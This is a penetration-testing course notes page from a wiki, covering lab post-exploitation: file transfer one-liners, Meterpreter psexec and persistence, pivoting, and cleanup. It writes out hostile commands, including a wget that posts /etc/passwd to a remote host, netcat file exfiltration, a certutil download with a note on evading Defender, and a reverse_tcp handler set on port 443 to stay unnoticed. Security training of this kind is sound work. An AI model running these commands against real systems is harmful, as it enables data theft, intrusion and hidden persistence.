🔐
SecWiki
  • Home
  • General
    • Interesting Links
      • Curriculum
    • Pentest Labs, Wargames Sites
      • How To Vulnhub with VirtualBox
  • Network Pentest
    • Courses
      • TCM - Zero to Hero
        • Week 1: Setup
          • ipsweep.sh
        • Week 2: Python 101
          • python101.py
          • bof.py
        • Week 3: Python 102
          • python102.py
          • scanner.py
        • Week 4: Passive OSINT
        • Week 5: Scanning Tools & Tactics
          • nmap
          • Nessus
          • msfconsole
        • Week 6: Enumeration
        • Week 7: Exploitation, Shells, and Some Credential Stuffing
        • Week 8: LLMNR/NBT-NS Poisoning
        • Week 9: NTLM
        • Week 10: MS17-010, GPP/cPasswords, and Kerberoasting
        • Week 11: File Transfers, Pivoting, Reporting
        • Commands
      • Penetration Testing Student (PTS)
      • OSCP Study
    • Recon
      • OSINT
    • Enumeration
      • Samba Shares
      • ProFtpd
    • Gaining Access
      • Reverse Shells
    • Privilege Escalation
      • Meterpreter
      • Spawning a TTY Shell
      • Reverse Shell Cheat Sheet
      • Cracking Hashes
      • Restricted Linux Shell Escape
      • Linux Privilege Escalation
        • lxd
        • sytemctl
      • Windows Privilege Escalation
        • Active Directory
          • What is AD?
        • User Enumeration
    • Post Exploitation
      • Cleanup
      • Maintaining Access
      • Pivoting
      • File Transfers
      • Covering Tracks
    • Vulnerabilities Checklist
    • Report Writing
  • Web App Pentest
    • Tools
      • Burp Suite
      • THC-Hydra BruteForce
    • Injection
      • SQL Injection
    • Broken Authentication
    • Sensitive Data Exposure
      • SQLite3
    • XML External Entity
      • XML Background
      • XPath Injection
    • Broken Access Control
    • Security Misconfiguration
    • Upload/Download
      • Download Bypass: Poison Null Byte
    • XSS
      • DOMXSS
      • Persistent XSS
      • Reflected (Client-side) XSS
      • Data URLs
    • Insecure Deserialization
    • Components with Known Vulnerabilities
    • Insufficient Logging and Monitoring
    • Server-Side Request Forgery (SSRF)
  • CTF
    • Intro to CTF
    • Forensics
      • Challenges
    • Steganography
    • Reverse Engineering
    • Tools
  • Network Security
    • Courses
      • Sec+
      • IBM Cybersecurity Analyst Professional Certificate
      • ISCI CNSS Course
        • Introduction to Network Security
          • Network Basics
          • Basic Network Utilities
          • The OSI Model
          • Threat Classification
          • Security Terminology
          • Approaches of Network Security
          • Law and Network Security
        • Types of Attacks
          • Denial of Service Attacks
          • Buffer Overflow Attacks
          • IP Spoofing
          • Session Hijacking
        • Fundamentals of Firewalls
          • What is a Firewall
          • Firewall Types
          • Firewall Implementation
          • Proxy Servers
          • Windows Firewalls
          • Linux Firewalls
        • Intrusion-Detection Systems
          • IDS Concepts
          • Components and Processes of IDS
          • Implementing IDS
          • Honeypots
        • Fundamentals of Encryption
          • The History of Encryption
          • Modern Encryption Methods
          • Windows and Linux Encryption
          • Hashing
          • Cracking Passwords
        • Virtual Private Networks (VPN)
          • Introduction to VPN
          • VPN Protocols
          • IPSec
          • SSL/TLS
          • VPN Solutions
        • Operating System Hardening
          • Configuring Windows
          • Configuring Linux
          • Operating System Patches
        • Virus Attacks and How to Defend
          • Virus Types and Attacks
          • Virus Scanners
          • Antivirus
          • Virus Infection and Identification
          • Trojan Horses
          • Spyware or Adware
        • Security Policies
          • User Policies Definition
          • System Administration Policies
          • Access Control
        • Assessing System Security
          • Risk Assessment
          • Conducting an Initial Assessment
          • Probing the Network
          • Vulnerabilities
          • Documenting Security
        • Security Standards
          • ISO Standards
          • NIST Standards
          • General Data Protection Regulation (GDPR)
          • PCI DSS
        • Physical Security and Recovery
          • Physical Security
          • Disaster Recovery
          • Fault Tolerance
        • Attackers Techniques
          • Hacking Preparation
          • The Attack Phase
          • Hacking Wi-Fi
    • The Web
    • The OSI Model
    • Malware Traffic Analysis with Wireshark
  • Digital Forensics
    • Autopsy - open-source digital forensics platform
  • Exploit Dev/Analysis
    • Code Review
      • Tools
    • Buffer Overflows
    • Static Analysis
      • Antivirus Scanning
      • Hashing
      • File strings
      • Packed and Obfuscated Malware
        • Demo: UPX
      • Portable Executable File Format (PE)
        • Tools
        • Linked Libraries and Functions
        • PE File Headers and Sections
  • Shell
    • ./missing-semester
      • Course overview + the shell
      • Shell Tools and Scripting
      • Editors (Vim)
      • Data Wrangling
      • Command-line Environment
    • Bash Tricks
    • .bashrc
    • Random Commands
      • sed
  • Hardware
    • NAND2Tetris
      • Boolean Functions and Gate Logic
      • Boolean Arithmetic and the ALU
      • Memory
      • Machine Language
      • Computer Architecture
      • Assembler
  • Other
    • K8s
      • Chapter 1: From Monolith to Microservices
      • Chapter 2: Container Orchestration
      • Chapter 3: Kubernetes
      • Chapter 4: Kubernetes Architecture
Powered by GitBook
On this page
  • File Transfers
  • Linux
  • Windows
  • Maintaining Access
  • Pivoting
  • Cleanup
  • The Legal Side
  • Report Writing
  • Career Advice

Was this helpful?

  1. Network Pentest
  2. Courses
  3. TCM - Zero to Hero

Week 11: File Transfers, Pivoting, Reporting

File Transfers, Pivoting, Report Writing, and Career Advice

Maintaining Access / Pivoting / Cleanup - This lesson will discuss methods of maintaining access on a network, pivoting into other networks, and how to properly clean up as you exit a network. The Legal Side of the House - This lesson will cover the important legal aspects that a pentester must know prior to conducting a penetration test. For example, having a rules of engagement document that specifies which networks can be attacked and what attack methods can be used. Knowing the common legal documents that a junior pentester may encounter will give him or her an advantage in their early careers. Report Writing - This lesson will cover the importance of report writing in penetration testing and walk through what should be included in a penetration test report. A demo penetration test report will be provided that will cover many of the findings that we have discussed in prior chapters. This will provide students with a clear understanding of what is expected on a penetration test report and how to write on effectively.

File Transfers

Linux

# HOST FILES
python -m SimpleHTTPServer 80
# OR
python3 -m http.server 80
python -m pyftpdlib -p 21 # FTP

# GRAB FILES
wget http://<ip>:80/secrets.txt
# RECEIVE FILES
nc -nvlp <port> file # redirect into new file
# SEND FILES
## nc
nc <ip> <port> < file
## wget, receiver has to clean the file
wget --post-file=/etc/passwd 192.168.202.128:8081
tail -n +10 file > clean_file # delete transfer data

Windows

# Windows Defender can block this, though there are ways to split files to bypass
# GRAB FILES - HTTP
C:\Users\fcastle>certutil -rulcache -f http://<ip>/secrets.txt secrets.txt

# GRAB FILES - FTP
C:\Users\fcastle>ftp <ip>
ftp> get <file>

Meterpreter

msf5 > use windows/smb/psexec
msf5 exploit(windows/smb/psexec) > set rhosts 192.168.202.134
msf5 exploit(windows/smb/psexec) > set smbdomain marvel
msf5 exploit(windows/smb/psexec) > set smbpass Password1
msf5 exploit(windows/smb/psexec) > set smbuser fcastle
msf5 exploit(windows/smb/psexec) > set target 2
msf5 exploit(windows/smb/psexec) > run
...
meterpreter > cd c:\\users
meterpreter > upload /root/files/secrets.txt c:\\secrets.txt
meterpreter > download c:\\secrets.txt secrets.txt

Maintaining Access

Persistence is dangerous and usually unnecessary for junior-mid level pentesting (time limited engagements, not red teaming). It opens a port on a machine with no credentials--leaves it wide open for a future attack. You'll have to go back in and delete the service and remove it from the registry. It'll give you an RC file to go in and delete the files for you, but it's generally dangerous and unnecessary.

Persistence Scripts

meterpreter > run persistence -h
exploit/windows/local/persistence
exploit/windows/local/registry_persistence

If you want to get a meterpreter shell back:

msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
# might set lport to be a known port to be sneaky
msf5 exploit(multi/handler) > set lport 443
msf5 exploit(multi/handler) > set lhost 192.168.202.128

Scheduled Tasks

run scheduleme
run schtaskabuse

Metsvc

run metsvc -A

Pivoting

Gained access to a machine on the 192 network that is dualhomed with the 10 network (just need two NICs, or network adapters in VBox).

# Check for other networks, besides ipconfig
route print
arp -a
netstat

Scanning on a pivot is incredibly slow, but:

use auxiliary/scanner/portscan/tcp

Cleanup

The cleanup process covers the requirements for cleaning up systems once the penetration test has been completed, not removing logs, etc. This will include all user accounts and binaries used during the test.

  • Remove all executable, scripts and temporary file from a compromised system. If possible use secure delete method for removing the files and folders.

  • Return to original values system settings and application configuration parameters if they where modified during the assessment.

  • Remove all backdoors and/or rootkits installed.

  • Remove any user accounts created for connecting back to compromise systems.

The Legal Side

Report Writing

Career Advice

PreviousWeek 10: MS17-010, GPP/cPasswords, and KerberoastingNextCommands

Last updated 4 years ago

Was this helpful?

LogoTCM-Security-Sample-Pentest-Report/Demo Company - Security Assessment Findings Report.docx at master · hmaverickadams/TCM-Security-Sample-Pentest-ReportGitHub
LEGAL / DOCUMENTS